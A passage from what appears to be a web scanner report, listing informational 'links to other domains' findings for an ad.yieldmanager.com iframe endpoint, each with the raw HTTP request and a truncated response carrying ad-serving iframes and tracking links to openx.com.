GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACZOgIVTeDRCnsRy-TFFKeiJxNOyT7DkE5Q5JrYAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1141245984%26r%3D0%26s%3D2126909,1d6c330c-ed53-11e0-a4eb-78e7d162b08a,1317600205281 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:27 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0171.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:03:27 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600205_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT11rhDAQ.DW-SUg05wfSh3ipRXqRHsi13otojNXzNDZazvrrG-pxf6DLsjszzA4ssgPLq0uE3LrgGNUu8gNkW9xFbmHXjgmDIECu7SPHgztsTnFYEYpgTPbP3DmSv6I-fd2QntQjR7mxN4-AGwUAS8Vum.T
...[SNIP]...
zNfrILwdn9JX3.ZJrNPI-GTQwr0l2BWRWVWIAcxbAALnstFrUCY6NNkRK1ElNj2BRDw3JWOYi20szZQV9zXmrcDpNQc66KoZJ9Pnz3pVB5I5TQhqvk2vELC2dztQ==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600205_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600205_HERE" border="0" alt="">
</a>
...[SNIP]...

19.59. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACGWhGs-N.RCm8qdGRvkffdG-J-T49cls2HJlZzAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D822639712%26r%3D0%26s%3D2126909,eaba2be4-ed52-11e0-aa4d-63b5f8f2f3a6,1317600120228 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:55 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0165.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:02:55 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317600120_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTdlugzAQ.BrekGVjrgj1wYQQoQbaVJSIvkRgNnUOMDVUOb6-bonyA12tdmdGs7OEBhXgup7ZVc3BgsomAaEW94hnUQ4mDoKAOg6lnoNdag5J2LCI4ITNN9xds7-KZtHzhPSMfLZOJvbqM3SOELKlSs-T9JX
...[SNIP]...
3Lsrx-HDKR3XP0.ZNpinHsDcoMK9bdoFFVDVyQ7KG7IC5bLVY7hXqhTbGCnYJBGDSysWG5N9nBvtHMdcgv57XG-24ANW5V1TWy3XbfbQ1qK0CBNpwk144fJnd0rg==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600120_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317600120_HERE" border="0" alt="">
</a>
...[SNIP]...

19.60. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD6RfqYGuTRClsiOGObo7w9R1weVpW9lqw4k6cIAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D231866446%26r%3D0%26s%3D2126909,615ee256-ed55-11e0-a70a-78e7d1fa053c,1317601178272 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:19:45 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0094.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:19:45 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601178_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTtFugzAM.BreUJQABSq0h9AIDa1Bq0SL2hdEg1m6AmEpUxFfv2xU.YFZln1nnc8mbiQwJhWsGw-7QQMNRMR1ROD4YQNg4yiKHLJygwAHxL6lcU0ZwSndFMLf0b9ga.a2IFNZSHfpwt5Diu4MIU9pfl9GXzz
...[SNIP]...
-vvDhJzvbz8fGn2X-xbTmOg-VSy0lM1mjUVQ0TUgP0ExKqM8Oq0WiQRpRoaDTcpOUyD1uOP6seLrVh.or8cnE2-NLfQI-lrvpadWX.3Z1BlxI0GEGrhFH8AJxYdEU=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601178_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601178_HERE" border="0" alt="">
</a>
...[SNIP]...

19.61. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgnEQVe-XRCpGmh9ZS5HpCZz6lne33RURs4zYxAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2748699372%26r%3D0%26s%3D2126909,33c9132e-ed56-11e0-b64e-78e7d15f2c3a,1317601531289 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:25:32 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0205.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:25:32 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601531_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlj99qgzAUxp.GOwnG.yK7iA2CW1PW4Vq6G9EkTqcxLjoqPv2yWvoCO4ST7zv8zhcCndiuGaspZ65TRVFguzF0bBrYFYtoaFpxHEPPCrwIBh40pyxhCEMrQ7sz9Y.oVjjCL5vSHYfomG3uNUTgigFwpSLXbfR
...[SNIP]...
2PnHUkPwkiNHv.kt5.Ms1mnkfDQYad6sPArErGFyBHPiyASqGHZa3A2GgoVbxWfGoMB7uWYfurHHjLtPM9-OdppXU7TFzNhSoHJkUx.IiKq6Lhimugl1QTv4M1dTc=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601531_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601531_HERE" border="0" alt="">
</a>
...[SNIP]...

19.62. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACtPaKi-HRCgH5Dl4W0RNCqXgNLdqmDuP.2xG8AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3412195991%26r%3D0%26s%3D2126909,dafdcc46-ed53-11e0-9ddb-2bf6a7f850eb,1317600523324 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:44 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0339.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:08:44 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317600523_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyPKDV4R6MEGktAGVCDWCCwLbFNKAU0OVKF9ft6D8QFer3ZnV7AwiPsTcxdwjrU0EZxD6iGDmIua6DTGh7.sWtG1nQyyEzSkOOA0RjOn2yJyM.lW4CV8XpGfo0Sxe2JtHwTUEwJIquS6nr8S
...[SNIP]...
yVXYoLK82Dc7H66P8n0-zm-WIQauBINwezqrm4AXkR4w0wOehj3Spw6bQoUqJVYuoMElrQwM5djqLnmjk2-uWs0bgfJ6HmStUjl0M1fg-NUFUnlNCCs2Ra8QOq5HM2,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600523_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317600523_HERE" border="0" alt="">
</a>
...[SNIP]...

19.63. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC55tze9ubRCvokzsa33c8p81LO8mAQ4SAyTtLiAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3624405863%26r%3D0%26s%3D2126909,158e3aa0-ed57-11e0-846f-78e7d15f7a00,1317601910069 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:50 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0073.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:31:50 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601910_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljN9qgzAUxp.GOwn511SRXcTGDlnjVnAt80Zsks7SarrUofTpF-boC-xwOOf3Hb7zIZJQFmEDl42JjvSA40WCCFZLgmJDSQiTJCGIIhwtGaPhLU81FwjmfJUptuW.JWLxMpOfIuJbO6u3iINRAECtk-N8-pI
...[SNIP]...
KfZbnrCpyN8vHIn8KwHYZrQHiA1741GFyjzQTs1fQTULbzx-bowLX1prUzR2dubUAEhQFmd9ubk.aKLWDstTp4PvU344baNb22Xd1.dwfj6tY44w0Xq7zjBySCcrw=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601910_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601910_HERE" border="0" alt="">
</a>
...[SNIP]...

19.64. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0fNrwOuHRCteMf2GbzkQc8kFzi5wTG15iFrWYAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1549900456%26r%3D0%26s%3D2126909,aaffb95a-ed53-11e0-b079-78e7d162bc94,1317600442806 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:23 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0338.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:07:23 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317600442_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlUGFrgzAQ.TV-k5AYtYrsQ2xwyJpuBWmpX0STOJ3VuOio669fVkf.wI7j7r3j3Ts4hKPQrSGEpUR17Qos6whhh29QhbmzsWEURcgLwtD3EPbtKY0FoQimZHvi.oHcg4b0ZUWm0oAc0pW9BQRcKQCu0uy6jj5
...[SNIP]...
0z0bHs.H3umbd.LJIn227mebQwsZzEpACzLoVcgBrlsACuejMsaw3GxogSLWstp8bC1IWW49.UIFthmPnbL-eVwe0wST0XuhyE6ovhq6-kLhqppRFcFDeKH55CdBI=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600442_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317600442_HERE" border="0" alt="">
</a>
...[SNIP]...

19.65. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOueIzEOXRCvocpygOopL5rxQ8fBRiebVhQlwCAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1498328172%26r%3D0%26s%3D2126909,f4307068-ed55-11e0-b442-78e7d161534a,1317601424593 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:45 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0189.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:23:45 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

